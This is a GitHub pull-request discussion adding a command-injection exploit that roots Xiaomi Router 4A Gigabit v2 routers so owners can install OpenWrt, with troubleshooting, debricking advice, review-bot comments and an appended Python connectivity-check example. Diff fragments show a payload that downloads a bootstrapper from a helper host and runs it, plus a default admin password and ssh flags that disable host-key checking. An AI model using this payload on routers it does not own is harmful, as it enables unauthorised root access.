Exploit scripts for the V2 of the Router with Firmware 2.30.20 #155
base: master
Conversation
Testscript not needed
@ViceEye your router IP address should be 192.168.31.1; this is the Xiaomi default router address.
I changed the router to extender mode so it can get online (I don't have a long cable yet). Before I did this it was not working either.
@ViceEye it seems you are not logged in to your Xiaomi router (192.168.31.1) admin page in a browser before you
I am logged in, in my browser though; let me retry. Does {"code": 0} mean a successful exploit?
{"code": 0}: I do not know this.
Fixed. I found out that WSL cannot do this!!! And this way works under a Windows env, so I removed the OS check in the script and it works now.
Wait, you've started the script in the Windows Linux env? I haven't tried this one, tbh. But we are also talking about a VM when I look at the 172.xxx.xxx.xxx address. I'll remove the OS check, not a problem, but with VMs this would be way harder.
…g condition if the router starts dropbear fast or slow somehow. The script was extended with log output to /tmp/exploit.log; the script was executed multiple times in a row without dropping out too soon.
Also, here is the output of a successful injection:
Above: telnet should work as soon as you see that the download of the 2 files worked and the script ended, even with an error saying ssh is not open. Try telnet. I executed the exploit multiple times in a row, even with a freshly rebooted router.
Thanks for this 🔥 Couple of things:
If the original script had been a class I could use or extend from, that would be no problem. But remember, you access variables of the same instance; when I access the function, the variable will be empty. And melting everything into one and letting people decide is not really a good idea. The users are overwhelmed with the options and setup they have to do right now; knowing which exploit to use would only open more tickets. We could remove your original script, if the other exploit works on older routers too.
@LordPinhead Unfortunately, I flashed again with the newest SNAPSHOT (r21150-63db906516). @acecilia And now my router starts with a solid orange light, and the light goes off and on, looping forever. IP 192.168.31.1 disappeared. What I guess is that I need to debrick my device. I have tried 1) Mi Wifi Repair tool, 2) TinyPXE4A. Both methods did NOT successfully debrick my device. I have tried different factory firmware, 2.28.xx and 2.18.28.bin. I guess that the bin file needs to be 2.30.20 for V2; however, I cannot find any place where I can download this version of the firmware. (There is a 3rd method: micky0867's bootp/tftp-server procedure. However, bootp is not found anywhere to download. I could not try this method.) I have realized my stupidity and carelessness cost me a lot of effort trying to save this device, and I have come to the point where I need your help. And I believe there will be others who will suffer from the same mistakes. With your help, it will help tremendously! Do you think all I need is actually the 2.30.20.bin file? Any direction I could go? Thank you very much, @LordPinhead @acecilia
@MrTaiKe well, there are no official OpenWRT builds for this device; you've flashed an unsupported firmware for a different router and bricked your device. V1 and V2 are different, and firmwares for them are not compatible. And there is no publicly available stock firmware for this device online as far as I know. I hope you have made a full backup of
@vanyasem Thank you for your reply. I understood V1 and V2 are different. I used @LordPinhead's code (commit #99634522) and successfully flashed OpenWrt onto it. OpenWrt 22.03.2 Sysupgrade was actually working on this device, except that WiFi features were missing. I was dumb enough to think SNAPSHOT might contain the wireless package, and flashing with the latest snapshot eventually bricked my device :( OH MY GOD, I do not have any mt0. Do you think I can use someone else's mt0, or will I have to just wait for the stock firmware 2.30.20 to be made publicly available? Thank you again
@MrTaiKe
@410252889
@410252889 Thank you very much for your help, you are a saviour!! @LordPinhead @vanyasem @acecilia
By the way, this is a great community place!
@RadioOperator Thank you for pointing out the AC1200/RB02. I have read through the entire thread of #141. Looks like @wbs306 #141 (comment) compiled a new OpenWrt firmware for R4AV2. Did anyone try to use @LordPinhead's code (commit #99634522) to flash @wbs306's compiled OpenWrt? @wbs306 would you please point out where I can find your compiled R4AV2 OpenWrt? I can test it out. Btw, in spite of the HW difference between V1 and V2, it is very strange to me that I was able to successfully flash the R4AV2 device with the OpenWrt 22.03.2 Sysupgrade firmware (as I mentioned earlier)
You already know that using the official build gives the WiFi problem because of the different chip.
Sorry that I am a newbie trying to learn many things in a short time. I kind of got what you are saying. So, assuming the major HW difference is just the WiFi chips, then the official build could be modified just in the code for the wireless chips? I am kind of surprised that I was able to flash it. It seems to me that the system has not changed much except for the wireless chips. Correct me if I am wrong? Thanks! I am guessing that it might retain most of the original R4A hardware except for using the AC1200 wireless chips.
I was offline for some time because I moved into a new home, but I simply moved the script into the original one. The exploit works on every version, even old ones, so it's not wrong. I exploited 8 routers successfully, 2 with really old firmware versions.
I really appreciate the amount of work that you guys put into this project to get the most out of this router, so thank you all for that. But if only the device had a USB port, my router would be functional now 😁
router_ip_address = input("Router IP address [press enter for using the default '{}']: ".format(router_ip_address)) or router_ip_address | ||
|
||
# get stok | ||
sys.exit("Stopping: script can only be run on a Mac/Linux system") |
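Review bot: the `sys.exit("Stopping: script can only be run on a Mac/Linux system")` at the end of this hunk refuses to run on every other platform without saying which step actually needs a Unix host, and the discussion above reports the script working on Windows once this check was removed. Gate only the platform-specific step (and name it in the message), or downgrade this to a warning, rather than exiting before the user has entered anything.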
Is this intentional? Windows support is being dropped again?
If you have a Windows system, remove the code and try it. I have no Windows that was working with it, and when I have to give it to somebody without much knowledge, a live disk in VMWare would be easier.
@@ -50,7 +67,8 @@ def get_stok(router_ip_address): | |||
return None | |||
key = re.findall(r'key: \'(.*)\',', r0.text)[0] | |||
nonce = "0_" + mac + "_" + str(int(time.time())) + "_" + str(random.randint(1000, 10000)) | |||
router_password = input("Enter router admin password: ") | |||
router_password = "12345678" | |||
router_password = input("Enter router admin password: '{}']: ".format(router_password)) or router_password |
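Review bot: the prompt on the last line of this hunk, `"Enter router admin password: '{}']: "`, has a stray closing bracket with no opening one (the IP prompt earlier in the patch uses `[press enter for using the default '{}']`). Beyond the typo, the default `"12345678"` is shown in the prompt and silently used on an empty Enter, and `input()` echoes whatever the user types; read the password with `getpass.getpass()` and reject empty input explicitly instead of falling back to a default. The `re.findall(r'key: \'(.*)\',', r0.text)[0]` two lines up also raises a bare IndexError when the page does not contain `key:`; check for an empty match and print what was received so the user sees why the login page did not look as expected.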
What is this hardcoded password?
It's not "hardcoded" - it's initialized and a user could change it. I used 12345678 for the tests and with the placeholder, I did not have to enter it all the time.
exploit_cmd += "curl -s http://{}:{}/bootstrapper_v2.sh > bootstrapper.sh && ".format(hosting_ip, http_port_number) | ||
exploit_cmd += "/bin/ash /tmp/bootstrapper.sh".format(hosting_ip, http_port_number, hosting_ip, http_port_number) | ||
|
||
|
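Review bot: the first line of this hunk saves the download to the relative path `bootstrapper.sh`, but the next line runs `/bin/ash /tmp/bootstrapper.sh`; unless the command chain changes into /tmp earlier, those are two different files. Redirect to `/tmp/bootstrapper.sh` explicitly. `curl -s` also exits 0 on an HTTP error, so with `&&` the chain would go on to execute whatever error page was saved; use `curl -sf` so a failed download stops the chain. The `.format(hosting_ip, http_port_number, hosting_ip, http_port_number)` on the second line is applied to a string with no placeholders and can be dropped.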
[detail] Double blank line
|
||
if checkHost(router_ip_address, 22): | ||
print("done! Now you can connect to the router using several options: (user: root, password: root)") | ||
print("* telnet {}".format(router_ip_address)) | ||
print("* ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -c 3des-cbc -o UserKnownHostsFile=/dev/null root@{}".format(router_ip_address)) |
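Review bot: the success message and both connection hints are printed only inside `if checkHost(router_ip_address, 22)`, yet the discussion above states that telnet is usable even when the port-22 check fails because dropbear starts late; print the telnet hint whenever the injection itself succeeded, and check ports 22 and 23 separately (polling for a while rather than once) so a slow dropbear does not report a failed run. On the ssh line, `-o UserKnownHostsFile=/dev/null` throws the host key away on every run, so the connection is never verified; after the first login the key should be pinned in a dedicated known_hosts file instead. The `-oKexAlgorithms=+diffie-hellman-group1-sha1` and `-c 3des-cbc` options are only needed for a dropbear build that lacks modern algorithms; the debug log posted further down shows curve25519-sha256 and ssh-ed25519 being negotiated without them, so present those flags as a documented fallback rather than the default hint.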
Why is oHostKeyAlgorithms=+ssh-rsa gone?
Why is it needed in the first place? The ssh client does the handshake and gets the right cipher and algorithms.
```text
debug1: Remote protocol version 2.0, remote software version dropbear
debug1: compat_banner: no match: dropbear
debug1: Authenticating to hella:22 as root
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: curve25519-sha256
debug1: kex: host key algorithm: ssh-ed25519
debug1: kex: server->client cipher: [email protected] MAC: compression: none
debug1: kex: client->server cipher: [email protected] MAC: compression: none
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: SSH2_MSG_KEX_ECDH_REPLY received
debug1: Server host key: ssh-ed25519 SHA256:vFou7A4lAJIvzCPMb1ds1Eve7pMZ2z4YNDGTpz48S+4
debug1: Host hella is known and matches the ED25519 host key.
```
Posting two URLs for new firmware versions of the Xiaomi Router 4A Gigabit Edition v2 (r4ag v2): http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_release_2.30.28.bin https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_6bdd4_2.30.500.bin Tested 2023.06.29: the new firmware 2.30.500 for the Xiaomi Router 4A Gigabit Edition v2 (r4ag v2) can also be unlocked for ssh.
The official OpenWrt snapshot firmware for the Xiaomi Router 4A Gigabit Edition v2 (r4ag v2) works, but the 5G WiFi is only 3 dB; after changing the 5G parameters a few times the WiFi disappears and the router needs to be rebooted.
This exploit doesn't work on r4acv2, but the current one does. It'd be incorrect to completely replace the current exploit.
When I use this exploit only by inputting the stock address (it doesn't work by IP address), it shows everything is correct, but I could not connect by cyber to upload the OpenWrt image to my router to continue the process.
Hi bro, can you describe how?
This is something where I could not find out why it happens. Sometimes the Dropbear SSH server takes too long to start, and even with a pause of 3 minutes the connection was unsuccessful. But the second time it works. Even on a shell I couldn't see why it behaves like this.
But I have the V2 and it worked, 3 of them, and they had the 2.30.20 firmware with the exploit. If you have a newer one in which this one is fixed and the other one works, my first one would be the best option, even when the code is doubled. Or somebody has the time to make modules and remove the duplicated code from the scripts; I don't have it.
My R4A gigabit edition flash is Winboard 250128JVSQ
that's r4a gigabit (r4av2?), and i have the regular r4a (r4acv2) |
Lastly, I can do it.
Device is the same as Xiaomi Mi Router 4A Gigabit, except for:
- 5G WiFi is MT7663
- addresses of leds, wifi and eth ports are slightly changed

Specs:
SoC: MT7621
CPU: 2 x 880 MHz
ROM: 16 MB
RAM: 128 MB
WLAN: MT7603, MT7663

MAC addresses:
WAN **** factory 0xe006 (label)
LAN *:f7 factory 0xe000
2.4 GHz *:f8 factory 0x0000+0x4 (mtd-eeprom+0x4)
5 GHz *:f9 factory 0x8000+0x4 (mtd-eeprom+0x4)

Installation:
Factory firmware is based on a custom OpenWrt 17.x.
Installation is the same as for Xiaomi Mi Router 4A Gigabit.
Probably the easiest way to install is to use the script from this repository: acecilia/OpenWRTInvasion#155
In a more advanced case, you can do everything yourself:
- gain access to the device through one of the exploits described in the link above
- upload sysupgrade image to /tmp
- overwrite stock firmware:
  # mtd -e OS1 -r write /tmp/sysupgrade.bin OS1

Recovery:
Recovery procedure is the same as for Xiaomi Mi Router 4A Gigabit.
Possible options can be found here: https://openwrt.org/inbox/toh/xiaomi/xiaomi_mi_router_4a_gigabit_edition
One of the ways is to use another router with OpenWrt:
- connect both routers by their LAN ports
- download stock firmware from [1]
- place it inside /tmp/test.bin on the main router
- configure PXE/TFTP on the main router
- power off 4Av2, hold Reset button, power on
- as soon as image download via TFTP starts, Reset can be released
- blinking blue wan LED will indicate the end of the flashing process, now router can be rebooted

[1] http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_release_2.30.28.bin

Signed-off-by: Dmitry Sokolov <[email protected]>
(cherry picked from commit 39e4f03)
Hello everyone. I have an R4AGv2 with 2.30.25 firmware. How can I install OpenWrt on my router? Is this possible or not, because on the OpenWrt site I see this: Warning 10/2022: Xiaomi is currently shipping v2 of the 4A Gigabit Edition; it's identifiable by fw version 2.30.20, and the name when assigned an IP from a DHCP (not your ISP's) via the WAN port, MiWiFi-R4AV2. This model cannot be flashed with OpenWrt.
Special thanks to @kokutoukiritsugu. Using this method I successfully unlocked telnet/ssh. You need to follow the steps you provided strictly. My steps are as follows, for everyone's reference:
Just a really important piece of information: I received a device with 2.30.500 and it didn't work no matter what. I saw the default DHCP range was changed to use a high port; change it to use this and you are good to go. Maybe it makes sense to verify the machine IP and show a warning?
@webysther's suggestion (changing DHCP pool) combined with using LordPinhead's latest worked perfectly on the exploit side. Weirdly, ftp refused to let me push the firmware to /tmp, but I was able to get in via telnet and then wget the payload instead.
Great! About FTP: for me only telnet works as well.
2024.7.21 Mi Router 4 Gigabit Version 2, Firmware version 2.30.500 works. |
Issue: SSH connection not working after script execution

Hi, I'm experiencing issues when trying to run the OpenWRT Invasion script on my Xiaomi Mi Router 4A Gigabit Edition (Firmware version 2.30.500). After executing the script, I receive the following message:

```text
dmitrybelyakov@dmitry-5 OpenWRTInvasion % python3 remote_command_execution_vulnerability.py
router_ip_address: miwifi.com start uploading config file...
```

I've tried using Telnet, but I'm getting "Connection refused". Does anyone have any advice on how to resolve this, or is there something specific I should check with my router's firmware version? Thanks for your help!
@DmitryBLKV have you tried running the script again? In my case that helped and on the next iteration it worked. |
Unfortunately this is patched for 3.0.129 on Xiaomi 4A (Global)
The setup I used is router IP 192.168.31.1, computer IP 192.168.31.2, and password 12345678 for the web interface; these are the default values.
The exploit is based on vanyasem's findings (#141 (comment)) and his comment in issue 141.
Start remote_command_execution_vulnerability_v2.py with python3; this will ask for the router IP, the local IP and the web interface password (default values are set), then it will pack a payload like before, a bootstrapper, and it will be injected into the set_config_iotdev URL. Basically, remote code execution.
It needs the dropbear and busybox executables plus the script. Because it was so different, I made a new Python script and a new bash script.
Now, with root access, the router is also open for OpenWRT.
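Two problems recur through this thread: the helper machine sitting on an address the router cannot reach (the 172.x VM/WSL address discussed early on, and the changed DHCP range that prompted the request to "verify the machine IP and show a warning"), and dropbear coming up late so that a single port-22 probe reports failure while telnet already works. The following is an added Python example of the pre-flight and post-injection checks that address both; it is not code from this repository or from any of the commenters. The function names, the /24 default mask, the sample addresses and the local stand-in listener used to exercise the poller offline are this example's own choices.

```python
"""Pre-flight and post-injection checks for an OpenWRTInvasion-style run.

Added example, not part of the repository. Assumptions (not from the
thread): the router's LAN is a /24 unless told otherwise, and a service
that has bound its port but not yet called listen() is a fair stand-in
for "dropbear not started yet" (connections to it are refused).
"""
import ipaddress
import socket
import threading
import time


def on_same_subnet(router_ip: str, hosting_ip: str, prefix_len: int = 24) -> bool:
    """True if hosting_ip lies inside the router's LAN network.

    prefix_len defaults to /24 (matching 192.168.31.0/24); pass the real
    mask when the router's DHCP range has been changed.
    """
    network = ipaddress.ip_network(f"{router_ip}/{prefix_len}", strict=False)
    return ipaddress.ip_address(hosting_ip) in network


def preflight_warnings(router_ip: str, hosting_ip: str, prefix_len: int = 24) -> list:
    """Return human-readable warnings about the chosen addresses (empty if fine)."""
    warnings = []
    host = ipaddress.ip_address(hosting_ip)
    if host.is_loopback:
        warnings.append(f"{hosting_ip} is a loopback address; the router cannot reach it")
    elif not on_same_subnet(router_ip, hosting_ip, prefix_len):
        warnings.append(
            f"{hosting_ip} is not in {router_ip}/{prefix_len}: the router will not be able "
            "to fetch the payload from this host (a VM/WSL NAT address is the usual cause)"
        )
    return warnings


def probe_port(host: str, port: int, timeout: float = 1.0) -> bool:
    """Single TCP connect attempt; True only if something accepted the connection."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def wait_for_services(host: str, ports=(22, 23), deadline: float = 180.0,
                      interval: float = 2.0) -> dict:
    """Poll each port until all are open or the deadline passes.

    Returns {port: bool}. Ports are tracked independently, so a telnet
    daemon that is already up is reported even if dropbear never appears.
    """
    status = {p: False for p in ports}
    end = time.monotonic() + deadline
    while True:
        for p in ports:
            if not status[p]:
                status[p] = probe_port(host, p)
        if all(status.values()) or time.monotonic() >= end:
            return status
        time.sleep(interval)


def start_delayed_listener(delay: float) -> int:
    """Constructed stand-in for a slow dropbear: bind a local port now, but
    only start accepting connections after `delay` seconds. Returns the port.
    Until listen() is called, connection attempts to the port are refused."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind(("127.0.0.1", 0))
    port = sock.getsockname()[1]

    def serve():
        time.sleep(delay)
        sock.listen(5)
        while True:
            conn, _ = sock.accept()
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    # Sample addresses are constructed: the defaults from the PR description
    # and a typical NAT address of the kind the thread mentions.
    for warning in preflight_warnings("192.168.31.1", "172.20.48.1"):
        print("warning:", warning)
    port = start_delayed_listener(3.0)
    print("immediate probe:", probe_port("127.0.0.1", port))
    print("after polling:", wait_for_services("127.0.0.1", ports=(port,), deadline=10, interval=0.5))
```

Against a real router the call is `wait_for_services(router_ip_address, ports=(22, 23))` right after the injection, and the telnet hint is printed when `status[23]` is true regardless of `status[22]`.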